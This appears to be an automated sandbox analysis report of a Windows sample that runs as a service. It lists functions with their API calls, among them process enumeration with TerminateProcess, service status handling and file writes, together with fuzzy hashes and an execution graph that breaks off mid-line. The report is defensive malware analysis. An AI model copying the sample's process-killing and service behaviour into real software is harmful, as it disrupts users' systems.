                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A5A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322570694.0000000000A5B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9d0000_qbf30bzbv7f7qnhdav.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32$Module32Next
                                                                                                                                                                                                            • String ID: Eln_
                                                                                                                                                                                                            • API String ID: 930127669-3437842203
                                                                                                                                                                                                            • Opcode ID: be4cc78da283987cb357fbc0dc250f4049f7ea051fe30f705d4d1c7d6c3bfc6b
                                                                                                                                                                                                            • Instruction ID: cb103d42892a12c27dfff0e4e9d15312672648889f49a5b82cf50845a6c7d0b1
                                                                                                                                                                                                            • Opcode Fuzzy Hash: be4cc78da283987cb357fbc0dc250f4049f7ea051fe30f705d4d1c7d6c3bfc6b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4FF13079A00204CFD715CFE9FC866A93BB5F7C9311B00C55AE486962B4EB3988A7CF51
                                                                                                                                                                                                            Function 009DCA40 Relevance: 10.8, APIs: 7, Instructions: 345fileCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateFileA.KERNEL32(?,80000000,?,00000000,00000003,00000000,00000000), ref: 009DCB20
                                                                                                                                                                                                            • ReadFile.KERNEL32(00000000,?,?,?,00000000), ref: 009DCB5D
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 009DCBBD
                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 009DCC1D
                                                                                                                                                                                                            • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 009DCED4
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 009DCF0E
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 009DCF47
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.1322438878.00000000009D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 009D0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322410149.00000000009D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322480504.0000000000A07000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A0C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A49000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A5A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322570694.0000000000A5B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9d0000_qbf30bzbv7f7qnhdav.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$CloseCreateHandle$CountReadTickWrite
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3478262135-0
                                                                                                                                                                                                            • Opcode ID: 6749f31cbeb231adf29bfcc88c58df59c72497ab15174343772159f44e4b58e5
                                                                                                                                                                                                            • Instruction ID: 2bb4d7748ba33bfa28bc22d514622ed0d467aa896493a8c6b62b43942f8ab72f
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6749f31cbeb231adf29bfcc88c58df59c72497ab15174343772159f44e4b58e5
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1BE163BAA00201DFC704DFE8FD86AB93B74FBD5711B10851AE8429B2B4E7364867CB55
                                                                                                                                                                                                            Function 009DBBC0 Relevance: 10.7, APIs: 7, Instructions: 205processCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 009DBC90
                                                                                                                                                                                                            • Process32First.KERNEL32(00000000,?), ref: 009DBCE3
                                                                                                                                                                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 009DBDDD
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.1322438878.00000000009D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 009D0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322410149.00000000009D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322480504.0000000000A07000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A0C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A49000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A5A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322570694.0000000000A5B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9d0000_qbf30bzbv7f7qnhdav.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CreateFirstOpenProcessProcess32SnapshotToolhelp32
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3397401024-0
                                                                                                                                                                                                            • Opcode ID: 528c9a7ac26e0aef7db2bee44d78eb30b5aa3b2d1f3a0a6b41fb7b24246e057e
                                                                                                                                                                                                            • Instruction ID: e2052be21cdcd774ee0618383d636486310ecdf4fef3a63b3972ed213d46bf28
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 528c9a7ac26e0aef7db2bee44d78eb30b5aa3b2d1f3a0a6b41fb7b24246e057e
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D291017AA11315CFC704DFE4FC96AA937B9FB99311B15811AE406972B0DB388997CF40
                                                                                                                                                                                                            Function 009E1530 Relevance: 9.2, APIs: 6, Instructions: 176filetimeCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateFileA.KERNEL32(?,00000000,00000000,00000000,00000003,00000000,00000000), ref: 009E15C3
                                                                                                                                                                                                            • GetFileTime.KERNEL32(00000000,?,?,?), ref: 009E168A
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 009E16A7
                                                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009E1715
                                                                                                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,2AC18000,FE624E21,00989680,00000000), ref: 009E1774
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 009E1792
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.1322438878.00000000009D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 009D0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322410149.00000000009D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322480504.0000000000A07000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A0C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A49000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A5A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322570694.0000000000A5B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9d0000_qbf30bzbv7f7qnhdav.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$CloseHandle$CreateSizeTimeUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3236713533-0
                                                                                                                                                                                                            • Opcode ID: d4ac49639c21a9765f5c3d6b20e60f5573b4c7fd83a630a10e8e9a6e83e3298e
                                                                                                                                                                                                            • Instruction ID: 0f646c940a8d12bebbca7e636610da90861137e80c311820292257acf4735be3
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d4ac49639c21a9765f5c3d6b20e60f5573b4c7fd83a630a10e8e9a6e83e3298e
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8B71FE7AA01304EFC700DFE9FC856A97BB4FBCA711B11855AE445922B4E73648A7CF44
                                                                                                                                                                                                            Function 009DBD08 Relevance: 7.6, APIs: 5, Instructions: 141COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 009DBDDD
                                                                                                                                                                                                            • TerminateProcess.KERNEL32(00000000,000000FF), ref: 009DBE24
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 009DBE68
                                                                                                                                                                                                            • Process32Next.KERNEL32(00000000,00000128), ref: 009DBF01
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 009DBF2F
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.1322438878.00000000009D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 009D0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322410149.00000000009D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322480504.0000000000A07000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A0C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A49000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A5A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322570694.0000000000A5B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9d0000_qbf30bzbv7f7qnhdav.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CloseHandleProcess$NextOpenProcess32Terminate
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3173823348-0
                                                                                                                                                                                                            • Opcode ID: 8676c7e2611cd57b5610e3fba051adffdf31b5a61386644da041d787c0cb0454
                                                                                                                                                                                                            • Instruction ID: 9db671d18ab438394cf3579caaa57d657dfe4b302b86a05cb9132a4d9d73d72d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8676c7e2611cd57b5610e3fba051adffdf31b5a61386644da041d787c0cb0454
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7D51FF7AA01315DFC704DFE4EC95AE937B9FB98326B11811AE40697260E7388997CB40
                                                                                                                                                                                                            Function 00A05440 Relevance: 7.6, APIs: 5, Instructions: 71synchronizationthreadCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,009EE92E,009ECA40,00000000,?), ref: 00A054B2
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000), ref: 00A054E4
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,009EE92E,009ECA40,00000000,?), ref: 00A0551D
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,009EE92E,009ECA40,00000000,?), ref: 00A05538
                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,000000FF,?,009EE92E,009ECA40,00000000,?), ref: 00A0554B
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.1322438878.00000000009D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 009D0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322410149.00000000009D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322480504.0000000000A07000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A0C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A49000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A5A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322570694.0000000000A5B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9d0000_qbf30bzbv7f7qnhdav.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CloseCreateHandle$EventObjectSingleThreadWait
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1404307249-0
                                                                                                                                                                                                            • Opcode ID: 8a277dca0079699cd13d51235f3ce1015a06ef58d80e3a3829ce05631c50d865
                                                                                                                                                                                                            • Instruction ID: a63d974acd207500ddf0abeb92ba562bc76f4264d6b42d7bd2764c43d61e8f5c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8a277dca0079699cd13d51235f3ce1015a06ef58d80e3a3829ce05631c50d865
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B631A938A05304DFD304CFA4ED89BA23BB5FB88711F10C119E5568B6B4E7758882CF91
                                                                                                                                                                                                            Function 009E1860 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • SetServiceStatus.ADVAPI32(00000000,00A405F8), ref: 009E19BA
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.1322438878.00000000009D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 009D0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322410149.00000000009D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322480504.0000000000A07000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A0C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A49000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A5A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322570694.0000000000A5B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9d0000_qbf30bzbv7f7qnhdav.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ServiceStatus
                                                                                                                                                                                                            • String ID: uRh
                                                                                                                                                                                                            • API String ID: 3969395364-64653548
                                                                                                                                                                                                            • Opcode ID: a3c5390e2cd6c3449014e1d3af956b7e73a469c6ced39d7e36adad4e055c2650
                                                                                                                                                                                                            • Instruction ID: 39501b5aafe275bdba9f9e461ad02c1095b04c49f3719326e39a23c15991ba1c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a3c5390e2cd6c3449014e1d3af956b7e73a469c6ced39d7e36adad4e055c2650
                                                                                                                                                                                                            • Instruction Fuzzy Hash: FC31BA7E650205EFD304CFE9FC899A63BB9F7A9322305C526E1428A274C7359563DF12
                                                                                                                                                                                                            Function 009E2120 Relevance: 6.2, APIs: 4, Instructions: 207processCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 009E21D0
                                                                                                                                                                                                            • Process32First.KERNEL32(00000000,00000128), ref: 009E2257
                                                                                                                                                                                                            • Process32Next.KERNEL32(00000000,00000128), ref: 009E2384
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 009E2426
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.1322438878.00000000009D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 009D0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322410149.00000000009D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322480504.0000000000A07000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A0C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A49000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A5A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322570694.0000000000A5B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9d0000_qbf30bzbv7f7qnhdav.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 420147892-0
                                                                                                                                                                                                            • Opcode ID: 0efa45bbd995fe1558bffb24a6a538b9e6c9e69d54a2f64297da26258fa6f7f3
                                                                                                                                                                                                            • Instruction ID: e75437920bc08bad092c8846306ac58625f4a46403d529159c7d5ea636e94847
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0efa45bbd995fe1558bffb24a6a538b9e6c9e69d54a2f64297da26258fa6f7f3
                                                                                                                                                                                                            • Instruction Fuzzy Hash: EB910F79A10314CBD301DFE5FC89AA937B8FBE5350B118116D842962B4E77688A7CF51
                                                                                                                                                                                                            Function 009E68D0 Relevance: 6.1, APIs: 4, Instructions: 64memoryCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,009E03A9,00000000,?), ref: 009E6957
                                                                                                                                                                                                            • RtlReAllocateHeap.NTDLL(00000000,?,009E03A9,00000000), ref: 009E695E
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,?,009E03A9,00000000,?), ref: 009E69C8
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,009E03A9,00000000,?), ref: 009E69CF
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.1322438878.00000000009D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 009D0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322410149.00000000009D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322480504.0000000000A07000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A0C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A49000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A5A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322570694.0000000000A5B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9d0000_qbf30bzbv7f7qnhdav.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$AllocAllocate
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1154092256-0
                                                                                                                                                                                                            • Opcode ID: a3358e88340f454ca4486eed615a4da64efd142dbf207500728c1fd530be2205
                                                                                                                                                                                                            • Instruction ID: 5ed1d9f07ef732f8188e0e4ad0b32ae6f1a916f257116d31d5f832b33641254f
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a3358e88340f454ca4486eed615a4da64efd142dbf207500728c1fd530be2205
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2721DCB9A41304DFD701DFE1FE89A953F38F796325B628504E489922B5E73298A3CF10
                                                                                                                                                                                                            Function 009F0FD8 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 409COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.1322438878.00000000009D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 009D0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322410149.00000000009D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322480504.0000000000A07000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A0C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A49000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A5A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322570694.0000000000A5B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9d0000_qbf30bzbv7f7qnhdav.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: XH$/
                                                                                                                                                                                                            • API String ID: 0-571299465
                                                                                                                                                                                                            • Opcode ID: d3133bfd3e7dfc905fa58a0a96d014ecce9b3e1dc54ebce8076dbeeef5851cb2
                                                                                                                                                                                                            • Instruction ID: 02a7f1bb2a9f4a03807c952a7c3f37af160c37ac0f938c0c7e01696f49b55b0b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d3133bfd3e7dfc905fa58a0a96d014ecce9b3e1dc54ebce8076dbeeef5851cb2
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 56F1FD39A01209CBC714EFE0FC92AFE77B8FB96311F00812AE546572A5EB714957CB51
                                                                                                                                                                                                            Function 00A050E0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134timeCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetSystemTime.KERNEL32(009F247D,00000001,?,?,009F247D), ref: 00A0518C
                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 00A052BE
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.1322438878.00000000009D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 009D0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322410149.00000000009D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322480504.0000000000A07000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A0C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A49000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A5A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322570694.0000000000A5B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9d0000_qbf30bzbv7f7qnhdav.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CountSystemTickTime
                                                                                                                                                                                                            • String ID: @AB
                                                                                                                                                                                                            • API String ID: 2164215191-841575833
                                                                                                                                                                                                            • Opcode ID: 6ff71f60c067353a5fc774fb41a9646eace7bd5589e4139081fcb3840d0c675b
                                                                                                                                                                                                            • Instruction ID: 724428f13741904c1c5df704e34fdbcec56f72c9e405d4b671098175873124e9
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6ff71f60c067353a5fc774fb41a9646eace7bd5589e4139081fcb3840d0c675b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4851DE7AA01614CFC708DFE9FD8A5A63BB1F7983513058116E4828B2B4E77588A3CB85

                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                            Execution Coverage:15.7%
                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                            Signature Coverage:0%
                                                                                                                                                                                                            Total number of Nodes:1717
                                                                                                                                                                                                            Total number of Limit Nodes:38
                                                                                                                                                                                                            execution_graph 9353 156c10 9355 156c21 RegisterServiceCtrlHandlerA 9353->9355 9356 156da2 SetServiceStatus CreateEventA 9355->9356 9357 156fc8 9355->9357 9358 156e58 SetServiceStatus 9356->9358 9359 156e3b 9356->9359 9360 156ea0 WaitForSingleObject 9358->9360 9359->9358 9360->9360 9361 156ecb 9360->9361 9363 163110 WaitForSingleObject 9361->9363 9364 156eff SetServiceStatus CloseHandle SetServiceStatus 9363->9364 9364->9357 10508 14e211 10509 14e240 ExitProcess 10508->10509 11135 15bf90 11138 15e140 11135->11138 11139 15e158 11138->11139 11140 160b00 8 API calls 11139->11140 11141 15bfb3 11140->11141 11142 164590 11143 1645bd 11142->11143 11144 160610 2 API calls 11143->11144 11145 1645c2 11144->11145 11146 16fde0 3 API calls 11145->11146 11147 1645ee 11146->11147 11148 165f98 11151 165706 11148->11151 11149 1686f1 11151->11149 11152 14d500 lstrlen 11151->11152 11152->11151 11084 14a307 11085 14a310 Sleep 11084->11085 11085->11085 10969 141080 10970 14108b 10969->10970 10973 160b00 10970->10973 10972 141117 10974 163f00 8 API calls 10973->10974 10975 160b1c 10974->10975 10975->10972 10976 142080 10977 142097 10976->10977 10978 160790 4 API calls 10977->10978 10979 1421e4 10978->10979 11153 14c980 11154 14c99d 11153->11154 11155 14e2c0 2 API calls 11154->11155 11156 14c9f6 11155->11156 11086 151500 11089 15ee60 11086->11089 11090 15b720 lstrlen 11089->11090 11091 15150f 11090->11091 11092 14bd08 11093 14bd10 11092->11093 11094 14a4e0 2 API calls 11093->11094 11095 14bdbb OpenProcess 11093->11095 11096 14bedd Process32Next 11093->11096 11099 14be67 CloseHandle 11093->11099 11094->11093 11095->11093 11097 14be02 TerminateProcess 11095->11097 11096->11093 11098 14bf19 CloseHandle 11096->11098 11097->11093 11097->11099 11101 14bf47 11098->11101 11099->11093 9365 174f8a 9366 174ec5 9365->9366 9369 147a04 9366->9369 9370 151bb0 2 API calls 9369->9370 9371 147a18 9370->9371 9372 142f90 2 API calls 9371->9372 9373 147a60 9372->9373 9374 151bb0 2 API calls 9373->9374 9375 147aa7 9374->9375 9376 142f90 2 API calls 9375->9376 9377 147b0e 9376->9377 9378 151bb0 2 API calls 9377->9378 9379 147b22 9378->9379 9380 142f90 2 API calls 9379->9380 9381 147bad 9380->9381 9382 151bb0 2 API calls 9381->9382 9383 147bc3 9382->9383 9384 142f90 2 API calls 9383->9384 9385 147c07 9384->9385 9386 151bb0 2 API calls 9385->9386 9387 147c7a 9386->9387 9388 142f90 2 API calls 9387->9388 9389 147cb7 9388->9389 9390 151bb0 2 API calls 9389->9390 9391 147d1b 9390->9391 9392 142f90 2 API calls 9391->9392 9393 147d90 9392->9393 9394 151bb0 2 API calls 9393->9394 9395 147da6 9394->9395 9396 142f90 2 API calls 9395->9396 9397 147dfc 9396->9397 9398 151bb0 2 API calls 9397->9398 9399 147e1a 9398->9399 9400 142f90 2 API calls 9399->9400 9401 147e73 9400->9401 9402 151bb0 2 API calls 9401->9402 9403 147e87 9402->9403 9404 142f90 2 API calls 9403->9404 9405 147ef1 9404->9405 9406 151bb0 2 API calls 9405->9406 9407 147f05 9406->9407 9408 142f90 2 API calls 9407->9408 9409 147f42 9408->9409 9410 151bb0 2 API calls 9409->9410 9411 147f62 9410->9411 9412 142f90 2 API 